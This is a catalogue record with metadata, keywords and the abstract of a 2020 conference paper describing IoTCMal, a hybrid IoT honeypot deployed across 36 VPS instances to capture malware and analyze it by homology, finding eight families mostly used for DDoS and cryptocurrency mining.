Visible to the public IoTCMal: Towards A Hybrid IoT Honeypot for Capturing and Analyzing Malware

TitleIoTCMal: Towards A Hybrid IoT Honeypot for Capturing and Analyzing Malware
Publication TypeConference Paper
Year of Publication2020
AuthorsWang, B., Dou, Y., Sang, Y., Zhang, Y., Huang, J.
Conference NameICC 2020 - 2020 IEEE International Conference on Communications (ICC)
Date PublishedJune 2020
ISBN Number978-1-7281-5089-5
Keywordsauthentication, authentication services, authorisation, Bridges, command injection attacks, composability, Computer hacking, homology analysis, honeypot, hybrid IoT honeypot, Internet of Things, invasive software, IoT, IoT device, IoTC-MAL, IoTCMal, low-interactive IoT honeypots, malicious samples, Malware, Metrics, network-connected devices, pubcrawl, resilience, Resiliency, Servers, video surveillance, virtual environment, virtualisation, vulnerabilities

Nowadays, the emerging Internet-of-Things (IoT) emphasize the need for the security of network-connected devices. Additionally, there are two types of services in IoT devices that are easily exploited by attackers, weak authentication services (e.g., SSH/Telnet) and exploited services using command injection. Based on this observation, we propose IoTCMal, a hybrid IoT honeypot framework for capturing more comprehensive malicious samples aiming at IoT devices. The key novelty of IoTC-MAL is three-fold: (i) it provides a high-interactive component with common vulnerable service in real IoT device by utilizing traffic forwarding technique; (ii) it also contains a low-interactive component with Telnet/SSH service by running in virtual environment. (iii) Distinct from traditional low-interactive IoT honeypots[1], which only analyze family categories of malicious samples, IoTCMal primarily focuses on homology analysis of malicious samples. We deployed IoTCMal on 36 VPS1 instances distributed in 13 cities of 6 countries. By analyzing the malware binaries captured from IoTCMal, we discover 8 malware families controlled by at least 11 groups of attackers, which mainly launched DDoS attacks and digital currency mining. Among them, about 60% of the captured malicious samples ran in ARM or MIPs architectures, which are widely used in IoT devices.

Citation Keywang_iotcmal_2020